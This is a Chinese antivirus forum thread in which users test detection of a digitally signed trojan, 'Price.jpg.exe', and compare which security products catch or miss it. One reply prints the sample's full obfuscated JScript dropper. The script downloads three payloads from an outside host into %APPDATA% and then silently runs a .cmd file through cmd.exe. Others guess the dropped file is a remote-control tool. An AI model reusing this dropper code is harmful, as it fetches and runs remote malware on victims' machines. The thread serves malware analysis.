楼主: 我要打十個
收起左侧

[病毒样本] Price.jpg.exe(有数签!)

  [复制链接]
我要打十個
 楼主| 发表于 2016-9-4 18:31:57 | 显示全部楼层
BHHZDQL 发表于 2016-9-4 18:26
这程序居然有数字签名
如果不这样干
很容易放过了



对的

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
BHHZDQL
发表于 2016-9-4 18:33:08 | 显示全部楼层

由于我无法控制自学习引擎的误报率,为了不造成普遍误报,这种带签名的木马还是交给文件名反病毒吧
心醉咖啡
发表于 2016-9-4 18:50:19 | 显示全部楼层
毒霸miss
pal家族
发表于 2016-9-4 19:48:13 | 显示全部楼层
本帖最后由 pal家族 于 2016-9-4 19:53 编辑

卡巴主防将其杀害!稍后补充



这辈子第二次看到SW的第三种报毒名@驭龙
上次报个了not a virus PDM XXXXXX 很尴尬。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
windows7爱好者 + 1 这波我服

查看全部评分

3801187
发表于 2016-9-4 20:23:42 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
windows7爱好者 + 1 依然66哒

查看全部评分

250662772
发表于 2016-9-4 20:35:24 | 显示全部楼层
[mw_shl_code=css,true]var c = "www.flareonqe.com/0/io/hotlink/wt4rud0ing/";
var b = "www.flareonqe.com/0/io/hotlink/wt4rud0ing/";
var a = "www.flareonqe.com/0/io/hotlink/wt4rud0ing/";


(function (GlobalObject) {

    function CreateObject(ProgId) {
        return new GlobalObject.ActiveXObject(ProgId)
    }
    var WshShell = CreateObject("WScript"+(1, ".Shell"));
    var flag = true, f = "DB.Stream";
    var DownloadFileFromURL;

    DownloadFileFromURL = function (Url, FileDest) {

        if (!FileDest || !Url) return null;
        FileDest = WshShell.ExpandEnvironmentStrings(FileDest);
        var oXMLhttp = CreateObject("Msxml2.XMLhttp");

        oXMLhttp.onreadystatechange=function()
          {
          if (oXMLhttp.readyState==4 && oXMLhttp.status==200)
            {
                flag = false;  
                with(CreateObject("ADO" + f)) {
                    Mode = 3;
                    Type = 1;
                    Open();
                    Write(oXMLhttp.responseBody);
                    SaveToFile(FileDest, 2);
                    Close();
                    return FileDest;
                }
            }
          }

        oXMLhttp.open("G" + (3, 4, "ET"), Url, true);
        oXMLhttp.send(null);
        while (flag) {GlobalObject.WScript.Sleep(1000)};
    }


    var FileDest = "%APPDATA%\\";
    var objShell = CreateObject( (89, 5, "Shell") + (54545, 656, ".Application") );
    FileDest = WshShell.ExpandEnvironmentStrings(FileDest);
    DownloadFileFromURL((56665, "h46t87t3p8s9:/69693/".replace(/\d/g,""))+GlobalObject.a+"EVOLUTIONDOTA30G", "%APPDATA%\\EVOLUTIONDOTA30G.exe");
    DownloadFileFromURL((434, "h564556t87t36566p8s9:/99/".replace(/\d/g,""))+GlobalObject.b+"EVOLUTIONDOTA2J", "%APPDATA%\\EVOLUTIONDOTA2J");

    if (((new Date())>1)) DownloadFileFromURL((34, "h46t87t3p8s9:/99/".replace(/\d/g,""))+GlobalObject.c+"EVOLUTIONDOTA61H", "%APPDATA%\\EVOLUTIONDOTA61H"+(7,(89, ".c")+"md" ));
    WScript.Sleep(50000);
    objShell[("zSzrhzrerlrl"+(8, "rrErxerczzrurzrrrztrre") ).replace(/[rz]/g,"")]( ('cm'+(677, 45, 'd.exe') ),'/c"'+FileDest+'EVOLUTIONDOTA61H'+(7,(89, ".c")+"md" )+'"','','',0);

})(this)[/mw_shl_code]
vm001
发表于 2016-9-4 20:39:15 | 显示全部楼层







如果最后远程这步也能拦截就好了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
windows7爱好者 + 1 还是不错的

查看全部评分

追梦空间
发表于 2016-9-4 20:50:42 | 显示全部楼层
drweb miss
我要打十個
 楼主| 发表于 2016-9-4 20:55:55 | 显示全部楼层
vm001 发表于 2016-9-4 20:39
如果最后远程这步也能拦截就好了


大神我想请教下,怎么看远控的
vm001
发表于 2016-9-4 20:58:00 | 显示全部楼层
我要打十個 发表于 2016-9-4 20:55
大神我想请教下,怎么看远控的


我也不知道。。。。。
不过这个样本那个释放的东东应该是个远程控制工具
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-14 06:51 , Processed in 0.112393 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表